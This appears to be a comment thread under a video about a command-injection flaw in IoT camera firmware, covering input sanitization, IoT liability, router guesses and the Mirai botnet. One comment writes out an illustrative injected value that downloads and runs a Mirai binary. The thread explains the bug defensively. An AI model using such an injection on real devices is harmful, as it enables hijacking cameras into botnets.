"Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone?" - It is not more secure. More accurately, the question of whether open source software is more or less secure than closed software is unknowable because we don't know how secure either category really is. I would, however, point to Ed's 21 April 2024 video, "this is a warning to anyone using php", which highlighted a 24-year-old buffer overflow vulnerability in glibc. If "it can be audited by anyone" really meant superior security, then that vulnerability would not have persisted for 24 years. I do agree with your original point, however -- the firmware should be available, and security through obscurity is no security at all.
It's neither. If the code is secure, both people checking it for "secure" or "vulnerable" will find nothing. Now if it's NOT secure, and let's assume 100% competency, IF you have someone checking it for security they will spot it. IF. And IF it's any software with any decent amount of users, someone WILL be looking for vulns and spot it. The "many eyes" thing only works IF there's actually many (competent) eyes looking out for things...
I think Ed's old Router is a Netgear Nighthawk, probably an R7000. I recognise the hideous casing and 3 way antenna setup. I flashed mine with FreshTomato, way better then NG's stock fw
My Guess was the R6400 because the PCB layout is different. Unless there is a revision of the R7000 that looks like the R6400 which i have never seen then i think it must be a R6400.
Or Tp-Link those were forever vulnerable routers :D
@@VladSuperKat Yupp...but you can change the firmware on them. The worst was the blunder when they changed the chipset from Marwell to some Broadcom crap: oh boy, are those vulnerable at the hardware level :D
Was about to guess Netgear. Welp
At least with a google search I could find photographs and articles about it, the shape of these Netgear routers is pretty recognizable. And I new about the trademark that it's known for the problems.
Companies, I would argue ARE 100% Liable, under Express Warranty. If you buy a product, they are expressing a warranty that there is nothing critically wrong or harmful with that item. A massive issue like this? I would 100% argue that breaks warranty and they are 100% Liable for any damage caused by the virus that was installed on your device because of their negligence of securing the device.
But then again, I'm not a lawyer, and the courts don't care about consumers would side with the company who is paying them behind the scenes.
If they made no significant attempts at resolving the issue you probably could but the courts are notoriously behind the times on these issues. The other problem is how many of these products flooding Amazon are just overseas companies.
Software companies are notoriously exempt from liability. Almost every software product has a user agreement that basically tells you they are not responsible even if the software is entirely unfit for its purpose and accidentally blows up your house instead. The degree to which such user agreements can be uphold in the court of law varies, but in general it does. Judges know nothing about software so they rely on industry experts, who basically explain them it's some sort of extremely complex magic that cannot possibly come with any sort of guarantees.
@@jbird4478 Except that's for the software itself, not for the physical hardware product that just happened to contain that software.
It's the responsibility of the manufacturer of the IoT device to figure this out. Either they develop their own stuff, or they can test open software, or they can hire a software company that's certified and has liability written in the contract.
If an IoT device burns your house down, then it doesn't matter if it's a hardware problem or a software bug.
Go sue China....oh wait you can't
Judges decide any case however they want, including jury trials because they control exactly what the jury sees. So in the miu case they did not show the video of the 'children' attacking the old man only selected still photos, for example.
Full access to firmware is not a bad thing. In fact, it should be a requirement for any device. How else are you going to re-flash the device or maintain it without dependency on the manufacturer that may or may not exist anymore?
security by obscurity is always safe until isn't, at which point it REALLY isn't
Why does this security camera have an operating system like linux to begin with?
All it needs is 1) a bootloader, 2) minimalist networking software, 3) video encoding stuff, and some encryption algorithm that can be part of the networking binary or the video binary.
The whole thing could be a single binary and be fully embedded, or it can be a few binaries running on freeRTOS.
Why would a camera need wget? Why would it need bash? What's the upgrade path of "a camera"???
@@sasjadevries A crappy standalone camera I bought 10 years ago had its own embedded HTTP server, so you could configure all sorts of options. Not all of them connect to a central controller.
@@sasjadevries lets you do facial recognition and stuff locally, and compress the archives and so on. If you are doing bunch of stuff like that, at a point you are better off just using linux, cause you just let the user put on whatever they want on it instead of writing custom software and drivers.
That said just don't connect your stuff directly to the internet. It's gonna get hacked.
@@mapu1 That is a good point, but with a catch.
I would rather do "local" object recognition on a server that multiple cameras connect into. Mix and match any server with any software and any camera, without vendor lock-in. The cameras could be just wired analog ones, or at most something digitally compressed.
Doing all the processing on the camera itself would make sense if you install the camera in a way that it can be jammed, because it has to be wireless, because it's on moving subject. Or if you only need one or two cameras for your property, and have no plans for expanding surveillance later.
10:07 Thanks LLL, your the best
@@makebreakrepeat quote
Replying. Agreeing. (algo bait)
This
Agreed
Had to zoom in and it was a bit fuzzy, but certainly legible. Thanks LLL
You are providing a great service, both by explaining interesting topical exploits but also by providing real courses to get people better educated. I am now retired after 40+ years in IT, starting with 25 years of assembly programming on realtime kernels in the mainframe world, then transitioning to security. Lack of knowledge about how the machines actually work is very common amongst modern programmers. Improvements in knowledge should lead to more secure architectures and code. Please keep up the good work.
The attitude of “it’s just software” needs to go away. There needs to be an engineering rigor applied to get correct(ish) and safe software. We don’t allow civil engineers to self certify so why are we doing that with software?
This started in the 70s where software was given special consideration. No consumer protections, licensing restrictions, etc. Maybe these things and CrowdStrike may change things.
@@glynnetolar4423because everybody and their mom can write software and publish it. This is anti elitist, anarchistic and awesome for all of us.
Medical device software needs to be certified bc it can kill ppl but nobody got ever killed by a software bug in a surveillance cam.
It's supply and demand. The need for software developers has grown exponentially (even logarithmically) over the last few decades. There are literally tens of millions of developers all over the world, and I would bet 99% of them do not have anything near a masters degree in engineering. Even if all companies required them to get advanced degrees and were willing to pay for that, there just aren't enough schools that could handle the load.
And let's face it, most developers just start out working on business logic in spreadsheet macros, or modifying JavaScript. Eventually, they are asked to work on something that is over their head.
There are quite strict rules for certain categories of software, OD-178, iso26262 and the whole safety-critical branch for medical equipment, aviation, etc.
Then the smarter governments usually have certifications for software handling personal data, payments, etc.
But this stuff should just be broader, such that you had at least some of this for software in household appliances.
@@andrewpredmore2968 I would argue, that this demand is unjustified.
Firstly, most agile developers are like stacking a framework on top of a framework, for something that could have been vanilla html+css generated from some markdown. Or they are shell scripting and pipelining filtering software A into filtering software B into conversion software, for what could have been a single shader.
Secondly, these soydevs mess up, so you need another soy dev fixing (i.e. ducktaping) the other's work, and a scrum master and a selfproclaimed tester.
Thirdly, even a small businesses, like a local bakery with 3 locations in your city, feels like it needs it's own app, because a website and PWA is not enough. And why would people make a few good tools, when you could make thousands of mediocre ones?
Finally, that spreadsheet script is usually for a job that could have been automated away, and shouldn't have been done in a spreadsheet to begin with.
p.s. ducktape is not a typo, "duck" is the canvas that the tape was made out of, before it was used for ducts😆.
The worst part is that the bug would not have occured if they just simply wrote directly to the file as the kernel would have refused it.....
indeed. What's this whole echo and redirection stunt for anyway? Does the shell have higher priv than the cgi Factory binary or what?
@@timoadler6356 I'm guessing that the echo is just a shortcut in the code to writing to the particular file, as @TheRobbix1206 describes. I'm guessing that one can control the brightness by writing certain values into that particular file, just like one can control the swapiness of the Linux kernel by writing into '/proc/something/swapiness'. (I don't remember the specific file, but hopefully you still understand what I'm trying to say.)
@@timoadler6356(I forgot:) That is, I don't think it has anything to do with privilege escalation. (I'd have to go back and watch the video again to make sure, by carefully noting what was executed and with what specific file(s).)
Yeah, it's as I thought. After zooming in (on my hand computer that has radios), the specific shell command is `echo DUTY_RATIO="%s" > /proc/driver/pwm`. So it looks like 'pwm' is a virtual file where one can write certain configuration to control the camera. (The camera reads that file, parses it, and acts accordingly.) So, while the kernel wouldn't prevent access to that file (as OP suggests), presumably the parser for that file would error out upon finding an arbitrary string instead of the expected literal atomic value (float? int? word?), much less executing said arbitrary string, which could be something like `DUTY_RATIO=wget 0.0.0.0 -o /mirai && /mirai`.
@TheRobbix1206 If the binary has permission to execute a shell command that writes to a file, then the binary should have permission to write directly to that file, so the kernel wouldn't deny opening the file (unless the effective user somehow got changed, but I don't see anything in the code that does that).
I've not embraced IoT stuff because I have no faith in businesses to create products that are "safe" if they have no external obligation to do so. For example, pharmaceuticals are heavily regulated for good reason because they have the potential to cause great harm. I don't want stuff like that in my home, thanks.
Great work, Ed.
It's funny that the vulnerability is in the line with the "safe_printf"
Literally in my very first lesson on C way back when, I learned what input sanitization is.
"the internet of things sucks" YES
Buying smart devices is ironically a dumb thing to do.
Why is anyone surprised that bugs like this exist? The number of connected devices out there is enormous. The companies developing these are probably more interested in launching the product than spending yet another dollar on testing or implementing a safer language. I have no idea how to fight this. Regulation? Informed users? Videos like this :-) -> definitely! Thanks for a good walk-through.
Router looks like a Netgear Nighthawk R7000.
Nighthawk lineup are insecure.
@@YaySyu What about when you run DD-WRT or OPEN-WRT latest kernels?
R6700
Why not just install OpenWRT?
@@MelroyvandenBerg You cant do it on most of them without flashing the board. I had to open mine up to flash it.
I actually made a presentation about Mirai back in 2018 for my security class. Man it feels like yesterday
I had a legal and ethics in computing course during the semester that the October 2016 Dyn ttack occurred. My group's assigned topic had to do with IoT devices. We had half of our project handed to us on a silver platter with that attack.
When people first started talking about networking elements and appliances in the home, I thought it was a pretty neat idea. When that became a reality and all those devices were connected to the Internet, I thought people were absolutely *insane* for using any of them. The closest thing to an IoT device I use is a Roku, and i'm happy to keep it that way. I even disable networking on my retro gaming PCs.
But how will I cook my food if my microwave can't connect to the Internet? How will I heat my home if my thermostat can't connect to the Internet? How will I know when my laundry is done if my washer and dryer can't connect to the Internet?
@@nomore6167 I mean, I get that you're joking, but it'll get to that point! It's already true that, where I live, I need to have a cell phone with its own separate data plan in order to activate a new modem for my cable broadband service. It's just ludicrous, but it's true....
@@MSThalamus-gj9oi Sadly, I believe you're right that it'll eventually get to that point. Either probably be a combination of people's laziness/"convenience" (wanting to be able to access everything from their phone), company greed (data collection / analytics for everything), company control, and planned obsolescence. Personally, I think it's bad enough right now when we need to go to a company's website to download the user manual for pretty much everything.
@@MSThalamus-gj9oi With regard to needing a cell phone to activate a new modem for your cable broadband service, what's the reason for that (if you don't mind me asking)? If it's because it requires an app, then it's even worse than simply requiring a cell phone; it'll probably require a relatively new cell phone because most companies will support only the latest device OS and maybe the one before that. I'm at that point right now with Capital One, my credit card provider. I have an iPhone 6s. Sure, it's 8 years old, but it does everything I need it to do. Except Apple doesn't allow this phone to upgrade to iOS 16.0 or above, and the Capital One app now requires iOS 16.0 or above. More accurately, the app says it supports my phone, and it will install on my phone, but when you open it, it says you need to upgrade to the latest iOS. So I lost the ability to get realtime notifications (about new charges, payment confirmation, fraud alerts, etc) and control my credit card from my phone simply because I refuse to buy a new phone.
If its not already regulated, this kind of software absolutly should be. And not just slaping the copany on the wrist when it gets found out, but something to prevent this from happening in the first place.
The bigger question is: Why `echo` into a file instead of, I dunno... just `fopen`ing the file and writing into it. It's not like `echo` is some sort of black magic, nor is the bash file pipe operation. I can't imagine that a program that can execute bash doesn't have access to `fopen`.
Lol, that flaw is so obvious, seeing the reverse-engineered code just hurts my eyes.
I am new to all of this and watch because its an interest. I had to go look up what input sanitation was and why you do it in code. After doing that, I watched the part where you explain the vulnerability and it made so much sense
"thanks Triple L, you're the best! I am a ***generic mobile user agent*** and I am very ***positive adjective*** that you were thinking of us!"
***actually viewing on a 1000:45 mega ultrawide with 10k smell-o-vision***
"...pft they dont even know im only pretending to be a mobile user"
I'm a mobile user agent, and I approve this message
0:42 Took me a minute to nail it down, but that specific router is the Netgear AC1900 wifi router (r7000). I can tell it's that rather than the AC1750 because yours has the usb port next to the wan port.
FreshTomato FW all I'm going to say.
right when the exploit was shown, i failed to understand how someone could even do this, like, i fail to process how someone could do this and be like "what could go wrong"
feels like programming became too accessible and we get vulnerabilities that could be prevented by thinking
I don't see you in my recommended often, but I am glad I clicked on this. I didn't realize you actually went through the binary and what not. It's really cool to see you do a technical dive in a layman-way, rather than just say "there is a vulnerability! ahh!"
The punch line is that they call atoi(), but don't use that value in the substitution!
Came down here for exactly this. They were so close, just use %d and that int var instead of the string... definitely a copy-paste-compile "hey it works" SHIP IT!
I'm always baffled by how those companies apparently never use code scans.
I've actually made a similar mistake, that got flagged by a code scan before any deployment.
I forgot to check one input which resulted in a potential full read access for the server directory.
Joke is: I've could have sworn, that I did the check in the other module.
...I _cannot_ believe that code passed any kind of review. "Y'know, I could write three lines of code that fopen()s a file and fprintf()s to it, but that's for suckers. I think I will _LAUNCH A SHELL TO RUN AN ECHO COMMAND!"_
Anyone in the chain who let those lines of code pass by them (in that screenshot there's at least two other examples of completely unnecessary shell commands) -- from the original coder to the reviewers to the release engineers to the managers of same -- should find themselves in front of HR arguing why they should continue to work for the company.
A shell that no one would normally see no less. I worked security at a company I'm not going to name for a specific reason: guess what cameras and software they used?
To get access to that print out, you gotta jump through some menus and you lose screen real estate, which is something you don't want when you're watching cameras for thieves and accidents. However, we had 3 monitors, so I'd have the camera's on 2 of them as I could fit just about every single camera in the whole warehouse that way, and still see what was happening, and on my left most monitor I had the thing that was displaying these messages and a notepad open. I'm also thankful that they had it set up in a way that my layout was tied to my account on their network, so when I logged into the computer and ran the software everything was already the way I had it, and I didn't have to worry about other guards messing with my shit. I actually was able to notify the people in charge of security multiple times that cameras were malfunctioning before it showed in the software by having that thing up, but the average user would have no idea it was there (I even had to teach the head of security how I did it, because she had no idea it was a thing).
It's actually better that they do post it, because it has to be fixed on sight.
What part of "unpatchable" do you not understand?
@@bits360wastaken what part of people don't have the power of prophecy do you not understand.
@@bits360wastaken But... It is fixable with a new firmware version release. As long as users install the new firmware version, the issue is patched. Yes, it technically is unpatchable because they can't just send the update to the user's device to auto install it, but the post calling it unpatchable is a red herring to begin with as it makes people assume that the issue can't be fixed at all, which is not the case.
@@GameDevMadeEasy they could abuse the bug to force the system to download and install a firmware upgrade.
@@EricDMMiller Companies can't do something like that as it is unethical and could lead them into legal hot water.
There are very creepy people out there that get enjoyment from hacking cameras and recording them live on the dark web. Be very careful with cameras. Even your webcam.
_Especially,_ with your webcam. I have a piece of blue tape over my MacBook’s camera, yes.
@@RubyCascade Here is some info that I wish I didn't know about: Search for the tag "hacked camera" in adult sites. That raises our paranoia to levels high enough that we want to warn all of our friends about keeping cameras on.
@@RubyCascade Once upon a time (10+ years ago) I was told that macbook cameras couldn't be powered without the green light turning on so that you knew it was being used. Later on I was told that it had been true but was no longer true, and could potentially be hacked at a firmware level. I have no idea of the validity of either of those claims.
@@DavidTriphon If you don't have a switch that physically cuts power to it, then it can totally be controlled by software :/ You can actually buy smartphones whithout camera and even microphone (so you need a headset to even use it as a phone). You can even order them to be shipped in tamper-evident packaging :)
@@reaperinsaltbrine5211 Those are prime targets for supply chain attacks, and factories that make consumer stuff arent profiling and hand picking people to assemble shit. I'd actually avoid that stuff like the plague if i was you.
Tamper-evident packaging is just straight up marketing, its an illusion.
Nothing really changed in the last 20 years. The people/companies still don't care about simple variable cleaning. Thanks for sharing 🙂
4:36 : I’m gonna say that’s a Netgear Nighthawk?
I can see the code when I run the video in landscape mode on my phone. You are the greatest, and this video is a keeper.
11:42 lmao, the noise of someone who is in despair
Thanks triple L, you're the best!
The realization of just "oh.... ohhhhh..... they're really doing " always gets me
Not much of a programmer myself, but you break these things down so well that I get a basic understanding of why things like this are bad.
this is so common, raw dogging http requests is the bread and butter of the tech industry, what validation? what sanitizing? who needs that!
9:06 pro tip: try using fzf - a command-line fuzzy finder, for finding files and/or input lines. Works like a charm in CLI workflow.
They did sanitize the input. They used a function with the word "safe" in its name before the system call, so they have met or exceeded the standard of IoT security.
I hope this is sarcasm
@@Rudxain yes and no. Saying they did sanitize was sarcasm. The jab at the lack of security in IoT wasn't - there is a horrible lack of security across the board
@@marklonergan3898 LMAO
I have zero clue what you are talking about 90% of the time but as a 2nd semester comp sci student, I love the structure of these videos! It’s fairly easy to follow along and it motivates me to learn more about cybersecurity:)
I love how even for NSA, translating a word into Russian makes it sound hackerish
11:42 When he _OOFd_ , I really felt that
So, why is it claimed to be “unpatchable”, as this seems like quite a simple thing to fix.
I think it is unpatchable in the sense that there won't be a patch available because it is a discontinued product
It's always a treat watching your show. I always learn something new.
Well, that’s why I keep my security cameras on their own local network :)
Your cameras aren’t safe, either, Mr. 2000s era pre-emoji smiley face
Werd. Mine are completely segregated...have their own router and everything.
@@RabbitWatchShop wait until you hear about MSN Messenger and how emojis already existed back then during the early 00s. Some people don't like to use image based smileys / emoji.
@@RabbitWatchShop ok mossad
That's why I don't use cameras. Actually, the real reason is that I don't find myself all that photognic anyway.
Ugh, I'm not a programmer, just been around IT long enough to be familiar with some concepts. Over the years I've written myself stupid heinous shell scripts thousands of lines long, which I know competent programmers would cringe at. But as amateurish as my scripting is, I always deliberately included lots of sanity checks for any arguments / input. And for other actions. Yes because I don't want my script deleting a wrong file but even where that's not a possibility, I did it simply for the practice & the habit because I know that is a CORE COMPETENCY of programming which I may want to explore one day.
This sort of shit is frustrating even for us who aren't programmers. Thanks for the explanation of it.
If you have built in cameras on your laptop do yourself a favor and buy yourself a six pack of webcam slide covers. $5 solution for a major problem.
You just glue them to your screen or notch and can block your cam for the 99% of the time you are not using it.
Thanks for showing the vulnerable code, need more of this type of content.
The lack of security in IoT and "home automation" is a carryover from SCADA. That world has been focused on getting things working so much that they seemed to forget the vulnerabilities.
I used constantly shake my head at the lack of security in PLC's, and other equipment, used in critical infrastructure and various other kinds of industrial automation. It's a mess, or at least used to be serval years ago.
To be fair: the SCADA world started way before globally connected networks were a reality and the sunk cost of all those systems make upgrading very costly. Also there are issues with QA and legal certfifications and the like.. Also: industrial control systems should be separated (if only for safety reasons) from other networks, with very narrow and well defined doors to the outside world. And frankly if operational safety and data/communications security are in conflict, I usually would pick safety.
@@reaperinsaltbrine5211, even with the separation, security was kicked down the timeline in the devices and PLC's. Until Stuxnet, there wasn't as big of a push for security, especially on the implementation side. At that time, manufacturers had considered and adopted it, but it wasn't used as it should have been.
My comment was to focus on the implementation side, mostly, since that's what was carried over into home automation and IoT. Complacency in those industries was not a good example, yet was followed in the big IoT movement when it reached the market.
@@JarheadCrayonEater You have valid points. Although I think the "IoT" crappiness is more the result of extremeely low profit margins than anything else. Also people's preferring convenience over anything else. About complacency: may have a role in it in many places.
The devices presented in the video are products of the typical Valley rent-seeking startup mentality. What frightens the crap out of me that this thinking is no creeping into medical devices, too, see NeuraLink: I don't want to have to do anything with those. Btw I do NOT have cameras, lights, fridge, anything that is allowed to communicate outside my network without expilcit permission. Hell, I deliberately stuck with good old mechanical lightswitches and a dumb fridge :D
These things will fade out like any other fad, the question is after how many damage?
@@reaperinsaltbrine5211 , you have great points as well.
It's not just one thing, as is usually the case. I'll just never forget when I started hearing the term "home automation" being used daily. I was a control system engineer on the pump stations in NOLA, among other industries, and just had to laugh at some of my stuff I saw coming out. Thinking "oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks".
@@JarheadCrayonEater oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks". Yeah...seems it is not only my experience. I sometimes surprised the whole thing didn't collapse on us yet :o) In the last ~20 years I mostly do infrastucture ops and the kludge-on-kludge patchwork I work with everyday LOL. Not to mention the kludges I put in there just to keep it rolling :/ New shiny things always get money....maintaining the guts of the system is an uphill battle :)
single handedly explained whole route people teach themself over decades, good job. btw why didn't you talk about the "unpatchable" nonsense in article title ?
*Shows Router guts* "Every router in this family was vulnerable to a zero-day-"
Me, looking 3 feet to my right seeing the exact router he just held up...
Hmm.
Install Fresh Tomato and move on with your life.
Good way of "spreading awareness" and making sure _everybody_ know what to exploit and where... I'm _sure_ that does SO much good. 😑
The worst thing is that this has already happened in the past.
Humans never learn...
Yup. Ever 5 years or so some company leaves passwords in plain text or allows SQL injection
Netgear Nighthawk R7000v1 would be my guess for the router. Good thing I replaced the firmware on mine on day 1 with an alternative.
It looks like they tried to sanitize quotes (the single character 0x22 they remove) but didn't realize that double quotes still allow string interpolation? What I don't get is why don't they pass the atoi'd result into the sprintf? They only compare that value to zero so they can issue an extra disable command. They could have done the zero comparison without converting to an integer, and since they already took atoi, they could have avoided the main security bug by using the integer in the string interpolation. There are two bugs in six lines of code. :/
Thanks Triple L, youre the best
I really hope it isn't, but that router looked like a netgear nighthawk.
It looks like I was a chump who bought one back in the day too 😭
@@TeejMcSteezDude I connected my old nighthawk 6 months ago and in my router logs was a message from the shadow server foundation warning me that they detected a vulnerable router with their scanners. I found the message because my computer caught ransomware and I was investigating logs. Look them up, im serious. it was terrifying
Thanks, Triple L, you're the best.
4:00 I am going to vomit.
I'm taking a wild guess, it's probably netgear
Sexually frustrating indeed
Its 5am im on 4 hours of sleep and on my way to the airport, Thanks for zooming in LLL
Even more fun is that you can place an ad with an ad network that executes this code remotely when people run their web browsers on the same network as their IoT devices. I think it's crazy that "Triple-L" runs without any web browser plugins to secure his own network from drive-by malware.
Thanks for doing a deep dive into the actual part of the firmware itself that caused the vulnerability!
But they've tried to sanitize the input and remove any double quotes (because the parameter is enquoted in ")
The thing is bash/sh still parses it. They could've got away with this if they used single quotes as these are not parsed by the shell.
Or just don't run pipe so simple things into a shell
> They could've got away with this if they used single quotes as these are not parsed by the shell.
Then the attacker can just inject a single quote to close the string and follow up with whatever command they please anyway
@@patsonical They did this absolute minimum of removing quotes
Ghidra properly decoding the entire file is probably the craziest thing in this video
This smells like code someone wrote at 2am as a part of a proof of concept that just stuck around into production, and no one's ever gone back, because that part of the code works and isn't driving new features.
Which is part of why the feature focus of software development these days irks me. Our jobs are framed features that solve user stories, or enablers to features that solve user stories, but so rarely on upkeep. This code needed to be torn out and rewritten long ago, but customers aren't asking for that.
@@offtheball87 customers definitely want safety. It seems more like a leadership problem.
@1783W they do, but it's an invisible benefit. If your focus is delivering value every sprint, you can easily misinterpret that to be delivering visible value every sprint. It's a leadership problem, but I think it's broader than the leadership of any given organisation.
@@1783W You didnt even know this flaw existed until this video, why would fixing this bring any perceptible value to you? Customers dont care about this stuff, really. There should be a dedicated agency to regulate this kind of issue.
I think this definitely falls into gross negligence. The problem is:
*Who wrote it
*What certifications they had
*What certifications / standards are even applicable?
*What standards are even being presumed by the customer?
OMG they are litteraly just writing a string to a driver file!!
WE HAVE A WRITE SYSCALL WHY ARE YOU SPAWNING A SHELLLLL!?!?!?!?!?!
EVEN WITHOUT SANITIZATION THAT WOULD HAVE EASIER, FASTER AND SAFER
This is why I hate Unix
@@supercellex4D lol what? windows has the same things lol
Instead of snprintf + system, they could have done fopen + fprintf + fclose, but that's one line more to type, probably too lazy to do it
@@supercellex4D
blame the devs for their bad practice? Nah
Blame the OS? Of course, because it's *definitely* the fault of the OS
@@not-pyroman Only Unix insists on magic files over documented predictable APIs
Yeah another one of these. I have seen tons of them. And it's weird that they never really get fixed or resolved. Even when a newer version of the same router comes out. It's like they start from scratch each time.
INTERNET OF SHIT
apple IOS ? 🤣
@@user-nl2ho9gk3y "Apple iOS"
Smart device -> Dumb Device
Downloadable firmware isn't bad -- open auditing is step one of a strong security engineering culture.
If your security relies on obscurity, the bad guys will still find it but the good guys will have a harder time diagnosing it!
If they would have written their cgi code in bash, then they would not need to call system and the code is then secure.
Yes.
Most secure code for web applications is... the shell!
Fight me!
Well, the ultimate step in the exploit was exploiting bash (actually sh, which depending on the system may or may not be bash).
@@__christopher__ what is counterintuitive but true: if the cgi is written in bash, you cannot exploit it, because instead of calling system() you just directly execute the thing. And if you directly execute, there is no exploitation possible.
This is such a good channel.
Great content and breakdowns.
Researchers be like:
- Found unpatchable 0-day vulnerability in cameras? Let's post it into public!
This is good I think. Cause the hackers who already found the exploit use it.. so if you do not say anything, that means these people can record you in your home ... if they tell everyone about it, those people can turn off the camera.
Do you really have enough trust in any company to think that they'd mention about massive vulnerability or do you prefer if everyone was living in ignorance?
@@kentacy69 Well, knowing that this wont be fixed and that there's probably something similtar in the gear we're all using right now, i'd be tempted to choose ignorance just so i can be a little less anxious about this stuff.
As a low level software developer this channel is exactly what this area needs. This sub domain is filled with people that release in productions products with parts of generic demo software. They think if they know how to use Arduino or other hobby tools like that they are qualified to develop highly integrated devices with complex systems. I know there is a pressure from the management to develop fast products, but I think we should have to courage to say wait a little, let me write the code, and stop copy code that we have no idea what contains. Anyway.....I may be considered and old dinosaur, but I like to have every part of my code write by me and my guys.....so that if any thing happens we can understand why and from where it is happening. Yes this may take long, but surely helps during the life time of the project and also adds to the security of the product. Yeah use opensource code, but review it first and try to identify any weakness it may contain, don't copy-paste just so that management is happy. Any way....nice video...liked it!
Thanks, Triple-L. You're the best!
Always validate input to a function, I've spent ours in the wee small hours fixing programs because there was no validation. The problem was usually nulls in a numeric field in a file coming from outside the business.
today i got asked again to turn on my cam and when absolut darkness was present and ppl got confused, i explained that i taped over my cam.
thank you for letting me know my reevaluation was correct.
LLL you’re great. The code you showed was clearly legible on mobile.
Pressure to complete projects too quickly leads to this kind of negligence.
Man, I still remember first learning about IoT in around 2015 and my first thought was "Wait, that sounds dangerous"
Good to know that even though I was technically new, it wasnt just me being a newbie and didnt know anything at the time
its ALWAYS the same way, ages ago we developed some protocols like smtp, pop, http and similar, guys writing the code NEVER thought about bad actors attacking those, that is why now we are fighting hard to have safer versions of such protocols, in parallel, it happened to e.g. machinery/cars communications protocols, not a single engineer developing CAN bus was expecting CAN bus exposed via wi-fi, and obviously for IoT it is even more difficult as very often it is coded by not very skilled people, never ever having any security experience, and their managers having such neither (obviously it also increases costs when cost is crucial to sell such crap), greetings from Poland, I love your vids sir
Funny how they thought that removing `"` (the 0x22 removal right before execution) is enough sanitization.
I won't say that they do not sanitize, they didn't sanitize properly; which is a mark of someone who does know how the shell works.
First time watching. You got some mad skills. Thank you!
The function is called cgi_safe_snprintf, which I would naively assume is doing some sort of sanitization.
Companies not having the binaries to download would just be security by obscurity. Great idea....
IoT (and most embeded if we're to be honest) is "Ship fast" not "Ship good". The reason i write lots of stuff like that for my MCU's is that it's for personal use only, but if i ever was to ship anything, or heck, even put it on a public repo, I'd have to go and clean a lot of jank stuff.
Negligence is a failure to exercise reasonable care, while gross negligence is a reckless disregard for safety. It's just simple negligence, and you can bet it's disclaimed as such in the terms of sale echoing the UCC terms. If it ever got to court, the defense would have no shortage of experts willing to testify the bug isn't unreasonable care, and I can think of several possibilities under which I would agree. For example, whoever wrote the code may not have known that it would ever be exposed to the public internet.
Internet of Shit. We warned about these devices more than a decade ago. Now the chickens have come back to roost and my surprise is 0%.
These injection attacks always remind me of Johnny tables at XKCD. Always validate your inputs!
Bobby Tables*